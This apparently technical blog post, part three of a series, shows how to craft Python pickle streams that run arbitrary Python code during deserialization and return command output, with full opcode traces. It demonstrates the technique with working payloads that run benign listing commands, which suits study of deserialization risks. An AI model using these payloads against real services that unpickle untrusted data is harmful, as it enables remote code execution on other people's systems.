Our Blog

Playing with Python Pickle #3

Reading time ~8 min

[This is the third in a series of posts on Pickle. Link to part one and two.]

Thanks for stopping by. This is the third posting on the bowels of Python Pickle, and it’s going to get a little more complicated before it gets easier. In the previous two entries I introduced Pickle as an attack vector present in many memcached instances, and documented tricks for executing OS commands across Python versions as well as a mechanism for generically calling class instance methods from within the Pickle VM.

In this post we’ll look at executing pure Python code from within a Pickle steram. While running os.system() or one of its cousins is almost always a necessity, having access to a Python interpreter means that your exploits can be that much more efficient (skip on the Shell syntax, slightly more portable exploits). I imagine one would tend to combine the pure Python with os.system() calls.

Normal execution of pure Python

Dynamic Python execution is normally acheived through the ‘exec’ statement. However, since ‘exec’ is a Python statement and not a class method, the depickler knows nothing about ‘exec’. __builtin__.eval() on the other hand is a method that the depickler can call; however eval() normally takes an expression only. Thus,

eval("import os; os.system('ls'))

fails. It’s worth noting that one can still call methods in expressions, so

eval("os.system('ls')")

can work if the ‘os’ module is present in the environment. If it isn’t, you can still import ‘os’ with the expression:

eval("__import__('os').system('ls')")

or even execute a full code block with a double eval():

eval('eval(compile("import os;os.system(\\"ls\\")","q","exec"))')

Moral of that story: don’t ever eval() untrusted input. Obviously.

However, we want to execute not only expressions but full Python scripts. eval() will also accept a code object, which is produced by compile(), and compile() will accept a full Python script. For example, to prove execution here’s the venerable timed wait:

cmd = "import os; f=os.popen('sleep 10'); f.read()"
c = compile(cmd,"foo","exec")
eval(c)

Reaching into eval’ed code

Continuing with eval(), we try a similar example except we execute ‘ls’  instead of sleep (and do it in one line of Python). There’s an important distinction here, and that is the return value of eval; notice how ‘ls’ returns nothing:

>>> ret=eval(compile("import os; f=os.popen('ls'); f.read()","foo","exec"))
>>> print ret
None

This is because eval() always returns “None” if the supplied code object was compiled with “exec” and means we need a different trick for extracting contents of the eval’ed script. Luckily our first idea worked (yay), so we didn’t look further; there may be better/faster/easier options. That idea was to modify the script’s globals (variables scoped for the entire script) inside the eval() call, and access globals outside the eval() calls. This works, as globals are passed into eval() and changes reflects after the call returns:

>>> print smashed
Traceback (most recent call last):
File "", line 1, in
NameError: name 'smashed' is not defined
>>> eval(compile("import os; f=os.popen('ls'); smashed=f.read()","foo","exec"))
>>> print smashed
Desktop
Documents
Downloads
Library
Movies
Music
...

Converting to Pickle

In the example above, the global “smashed” is created inside eval(), and carried into the outer environment. It is quite easy to convert the eval(compile()) pattern into a Pickle:

c__builtin__
eval
(c__builtin__
compile
(S'import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n'
S""
S"exec"
tRc__builtin__
globals
)RtRc__builtin__
globals
)R.

This executes ‘ls -al’, stores it in the “smashed” global variables and returns the whole globals dict as the end result of depickling. However, it is messy; globals contains other entries which is a waste of space and makes output harder to read. If we’re inserting this into a broader pickle, we’d like to have more control (i.e. return a single string) rather than hope that whatever object we are injecting into can handle a dict.

Final exercise

Pickle does not appear to have a way of referencing dict entries (i.e. globals()[‘smashed’] in Python), so again we have to dig into the docs. The dict builtin supports a “get” method, but requires a class instance… which should sound a little familiar if you still recall the trick from the last post on reading output from os.popen. In Python terms what we’re doing is:

code=compile("import os; f=os.popen('ls'); smashed=f.read()","foo","exec")
eval(code)
__builtin__.apply(__builtin__.getattr(__builtin__.dict,"get"),(__builtin__.globals(),"smashed"))

Converted into Pickle we get:

c__builtin__
eval
(c__builtin__
compile
(S'import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n'
S""
S"exec"
tRc__builtin__
globals
)RtR0(c__builtin__
globals
)RS"smashed"
tp0
0c__builtin__
getattr
(c__builtin__
dict
S"get"
tRp1
0c__builtin__
apply
(g1
g0
tR.

The execution trace of this Pickle stream is:

  1. ‘c’ -> find the callable “__builtin__.eval”, push it onto the stack
    [SB] [__builtin__.eval]
  2. ‘(‘ -> push a MARK onto the stack
    [SB] [__builtin__.eval] [MARK]
  3. ‘c’ -> find the callable “__builtin__.compile”, push it onto the stack
    [SB] [__builtin__.eval] [MARK] [__builtin__.compile]
  4. ‘(‘ -> push a MARK onto the stack
    [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK]
  5. “S’import os\\np=os.popen(“ls -al”)\\nsmashed=p.read()\\n'” -> push ‘import os\\np=os.popen(“ls -al”)\\nsmashed=p.read()\\n’ onto the stack
    [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK] ['import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n']
  6. “S”” -> push ” onto the stack
    [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK] ['import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n'] ['']
  7. “S’exec'” -> push ‘exec’ onto the stack
    [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK] ['import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n'] [''] ['exec']
  8. ‘t’ -> pop ‘import os\\np=os.popen(“ls -al”)\\nsmashed=p.read()\\n’,”,’exec’ and MARK, push (‘import os\\np=os.popen(“ls -al”)\\nsmashed=p.read()\\n’,”,’exec’)
    [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [('import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n','','exec')]
  9. ‘R’ -> pop “__builtin__.compile” and “(‘import os\\np=os.popen(“ls -al”)\\nsmashed=p.read()\\n’,”,’exec’)”, call __builtin__.compile(‘import os\\np=os.popen(“ls -al”)\\nsmashed=p.read()\\n’,”,’exec’), push the code object onto the stack
    [SB] [__builtin__.eval] [MARK] [code_object]
  10. ‘c’ -> find the callable “__builtin__.globals”, push it onto the stack
    [SB] [__builtin__.eval] [MARK] [code_object] [__builtin__.globals]
  11. ‘)’ -> push an empty tuple onto the stack
    [SB] [__builtin__.eval] [MARK] [code_object] [__builtin__.globals] [()]
  12. ‘R’ -> pop “__builtin__.globals” and “()”, call __builtin__.globals(), push the dict onto the stack
    [SB] [__builtin__.eval] [MARK] [code_object] []
  13. ‘t’ -> pop code_object, and MARK, push (code_object, )
    [SB] [__builtin__.eval] [(pop code_object, )]
  14. ‘R’ -> pop “__builtin__.eval” and “(pop code_object, )”, call __builtin__.eval(pop code_object, ), push the None onto the stack
    [SB] [None]
  15. ‘0’ -> pop None from the stack
    [SB]
  16. ‘(‘ -> push a MARK onto the stack
    [SB] [MARK]
  17. ‘c’ -> find the callable “__builtin__.globals”, push it onto the stack
    [SB] [MARK] [__builtin__.globals]
  18. ‘)’ -> push an empty tuple onto the stack
    [SB] [MARK] [__builtin__.globals] [()]
  19. ‘R’ -> pop “__builtin__.globals” and “()”, call __builtin__.globals(), push the dict onto the stack
    [SB] [MARK] [<globals dict>]
  20. “S’smashed'” -> push ‘smashed’ onto the stack
    [SB] [MARK] [<globals dict>] ['smashed']
  21. ‘t’ -> pop <globals dict>, ‘smashed’ and MARK, push (, ‘smashed’)
    [SB] [(<globals dict>,'smashed')]
  22. ‘p0’ -> store (<globals dict>, ‘smashed’) in register 0
    [SB] [(<globals dict>,'smashed')]
  23. ‘0’ -> pop (<globals dict>, ‘smashed’) from the stack
    [SB]
  24. ‘c’ -> find the callable “__builtin__.getattr”, push it onto the stack
    [SB] [__builtin__.getattr]
  25. ‘(‘ -> push a MARK onto the stack
    [SB] [__builtin__.getattr] [MARK]
  26. ‘c’ -> find the callable “__builtin__.dict”, push it onto the stack
    [SB] [__builtin__.getattr] [MARK] [__builtin__.dict]
  27. “S’get'” -> push ‘get’ onto the stack
    [SB] [__builtin__.getattr] [MARK] [__builtin__.dict] ['get']
  28. ‘t’ -> pop __builtin__.dict,’get’ and MARK, push (__builtin__.dict,’get’)
    [SB] [__builtin__.getattr] (__builtin__.dict,'get')
  29. ‘R’ -> pop “__builtin__.getattr” and “(__builtin__.dict,’get’)”, call __builtin__.getattr(__builtin__.dict,’get’), push the attribute onto the stack
    [SB] [dict.get]
  30. ‘p1’ -> store dict.get in register 1
    [SB] [dict.get]
  31. ‘0’ -> pop dict.get from the stack
    [SB]
  32. ‘c’ -> find the callable “__builtin__.apply”, push it onto the stack
    [SB] [__builtin__.apply]
  33. ‘(‘ -> push a MARK onto the stack
    [SB] [__builtin__.apply] [MARK]
  34. ‘p1’ -> push dict.get from register 1
    [SB] [__builtin__.apply] [MARK] [dict.get]
  35. ‘p1’ -> push (<globals dict>, ‘smashed’) from register 0
    [SB] [__builtin__.apply] [MARK] [dict.get] [(<globals dict>, 'smashed')]
  36. ‘t’ -> pop dict.get,(<globals dict>, ‘smashed’) and MARK, push [dict.get,(<globals dict>, ‘smashed’)]
    [SB] [__builtin__.apply] [(dict.get,(<globals dict>, 'smashed'))]
  37. ‘R’ -> pop “__builtin__.apply” and “(dict.get,(<globals dict>, ‘smashed’))”, call __builtin__.apply(dict.get,(<globals dict>, ‘smashed’)), push the “smashed” value onto the stack
    [SB] ["Desktop\nDocuments\nDownloads\n..."]
  38. ‘.’ -> pop and return value of “smashed”, exit
    [SB]

Ending off

This post demonstrates a few concepts that are of interest to the Pickle hacker. We showed how to construct a Pickle stream such that arbitrary Python was executed during the deserialization process, we mentioned that it was possible to carry information from within an eval() call into the executing environment of the depickler, and finally we revisited the trick for indirectly calling class instance methods in order to return eval()’s value as the depickled object.

In the last posting on this topic, we’ll look at tactical uses for all the Pickle hacking we’ve covered: where to find Pickle objects, where they’re processed and how to modify objects in place. Stay tuned.